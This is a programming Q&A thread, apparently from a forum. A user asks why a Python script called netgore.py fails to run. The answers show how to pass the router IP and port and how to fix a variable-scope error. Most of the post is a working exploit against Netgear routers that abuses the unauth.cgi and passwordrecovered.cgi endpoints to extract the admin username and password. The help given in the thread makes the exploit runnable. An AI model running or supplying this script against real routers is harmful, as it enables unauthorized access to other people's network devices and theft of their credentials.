# Router script index error

Tags: python-3.x

I recently discovered a python script to test the password security of Netgear routers. The code is not mine and I can't figure out why it returns errors when running. It was posted by an experienced coder:

```
## netgore.py
import sys
import requests

def scrape(text, start_trig, end_trig):
        if text.find(start_trig) != -1:
                return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
        else:
                return "i_dont_speak_english"
#disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
#1st stage - get token
ip = sys.argv[1]
port = sys.argv[2]
url = 'http://' + ip + ':' + port + '/'
try:
        r = requests.get(url)
except:
        url = 'https://' + ip + ':' + port + '/'
        r = requests.get(url, verify=False)
        model = r.headers.get('WWW-Authenticate')
if model is not None:
        print("Attcking: " + model[13:-1])
else:
        print("not a netgear router")
        sys.exit(0)
token = scrape(r.text, 'unauth.cgi?id=', '\"')
if token == 'i_dont_speak_english':
        print("not vulnerable")
        sys.exit(0)
print("token found: " + token)
#2nd stage - pass the token - get the password
url = url + 'passwordrecovered.cgi?id=' + token
r = requests.post(url, verify=False)
#profit
if r.text.find('left\">') != -1:
        username = (repr(scrape(r.text, 'Router Admin Username</td>', 
'</td>')))
        username = scrape(username, '>', '\'')
        password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
        password = scrape(password, '>', '\'')
        if username == "i_dont_speak_english":
                username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
                password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
else:
        print("not vulnerable becuse password recovery IS set")
        sys.exit(0)
#html encoding pops out of nowhere, lets replace that
password = password.replace("&#35;","#")
password = password.replace("&#38;","&")
print("user: " + username)
print("pass: " + password)
```

Returns error

```
line 14, in <module>
ip = sys.argv[1]
IndexError: list index out of range
```

I've read other posts regarding index errors but can't see why here. Much Thanks.

Answer (score 1):

you need to call the file with the command line:

```
python netgore.py 192.168.1.1 80
```

the ip supplied should be replaced with the ip of the router and the port replaced with the port needed to make the connection.

sys.argv asks for an argument to the file and [1] is the first argument supplied i.e the ip address and [2] is the second argument i.e the port.

Comment: Thanks for the tip. I'll give that a try. I was just running the module right from IDLE and not calling it from a command line and supplying those arguments.

Comment: Well I got a step further. Running the script from command line and passing the ip address and port arguments I get error `line 23, in <module> if model is not None: NameError: name 'model' is not defined`

Comment: Also tried using port 8080 (common router remote management port) and got a text wall of errors. Wish there was a better explanation on how to properly use this script.

Comment: Well model isn’t defined until the try block. It is only defined if the try block fails. Try moving it to the try arg not the except arg